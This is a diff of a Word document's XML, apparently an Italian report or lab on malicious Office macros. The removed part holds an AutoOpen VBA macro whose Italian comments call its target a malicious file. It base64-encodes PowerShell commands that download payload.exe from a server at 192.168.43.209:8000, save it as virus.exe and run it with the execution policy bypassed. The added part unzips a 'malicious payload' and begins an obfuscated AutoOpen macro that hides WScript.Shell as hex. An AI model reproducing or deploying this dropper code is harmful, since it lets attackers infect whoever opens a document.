+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Rilascio</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>l'oggetto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set shell = Nothing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>End Sub</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Decomprime la cartella col payload malevolo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
         <w:t xml:space="preserve">Sub </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -1247,7 +1832,7 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>AutoOpen</w:t>
+        <w:t>unzip</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1265,153 +1850,262 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
+      <w:r>
+        <w:t>Dim FSO As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sfolder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sApp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>MyFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>As</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExtractTo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>As</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Variant</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set FSO = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Scripting.FileSystemObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Dim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> codificato </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>As</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
+        <w:t>sfolder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "C:\Users\crist\Downloads\"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>MyFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Dir(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>sfolder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vbNormal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExtractTo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sfolder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Do While </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>MyFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;&gt; ""</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        If </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Right(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>MyFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, 3) = "zip" Then</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sApp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Shell.Application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>String</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Dim codificato2 As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim comandoBase64 As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>comandoDaEseguire</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim comandoDaEseguire2 As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Dim shell As Object</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Set shell = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>VBA.CreateObject</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>("</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WScript.Shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>' comando per scaricare il file malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>codificato</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = EncodeBase64("(New-Object </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Net.WebClient</w:t>
+        <w:t>sApp.Namespace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExtractTo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramStart"/>
@@ -1420,397 +2114,72 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>DownloadFile</w:t>
+        <w:t>CopyHere</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>('" &amp; "http://192.168.43.209:8000/payload.exe" &amp; "', '" &amp; "C:\Users\</w:t>
-      </w:r>
-      <w:r>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:r>
-        <w:t>\Downloads\virus.exe" &amp; "')")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>' comando per eseguire il file malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:t>codificato2 = EncodeBase64(" &amp; 'C:\Users\</w:t>
-      </w:r>
-      <w:r>
-        <w:t>malware</w:t>
-      </w:r>
-      <w:r>
-        <w:t>\Downloads\virus.exe'")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">' Comando </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> codificato in base64</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:t>comandoBase64 = "IEX([</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>System.Text.Encoding</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>' decodifico i due comandi da base64 a normali</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>comandoDaEseguire</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Replace</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sApp.Namespace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>comandoBase64, "BASE64_ENCODED_COMMAND", codificato)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    comandoDaEseguire2 = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Replace</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>comandoBase64, "BASE64_ENCODED_COMMAND", codificato2)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ' Esegui il comando </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> per scaricare il file malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>shell.Run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> "powershell.exe -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>NoProfile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ExecutionPolicy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>comandoDaEseguire</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, 0, True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">' Esegui il comando </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> per eseguire il file malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>shell.Run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> "powershell.exe -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>NoProfile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ExecutionPolicy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Bypass -Command " &amp; comandoDaEseguire2, 0, True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve">' </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>Rilascio</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>l'oggetto</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Set shell = Nothing</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sfolder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>MyFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>).Items</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DoEvents</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        End If</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>MyFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = Dir</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Loop</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1832,138 +2201,435 @@
           <w:bCs/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
+        <w:t>CODICE MACRO OFFUSCATO</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Const</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ttjizrllxwajdvfd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Const euspdrz = 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Const </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ijuxigpwgeu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Sub </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>AutoOpen(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim ddvsalsbhsamkq As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim eavmyimjn As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim dsffuvx As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dim dbrdnepriwzak As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Set dbrdnepriwzak = VBA.CreateObject(rlhlektfjszistm("575363726970742e53") &amp; rlhlektfjszistm("68656c6c"))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>CODICE MACRO OFFUSCATO</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Const </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ooezovykprtt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = 2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Const </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>aqmjwdobeoqj</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = 1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Const </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ehtsfjs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = 0</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Sub </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>AutoOpen(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Dim </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lsqusheic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
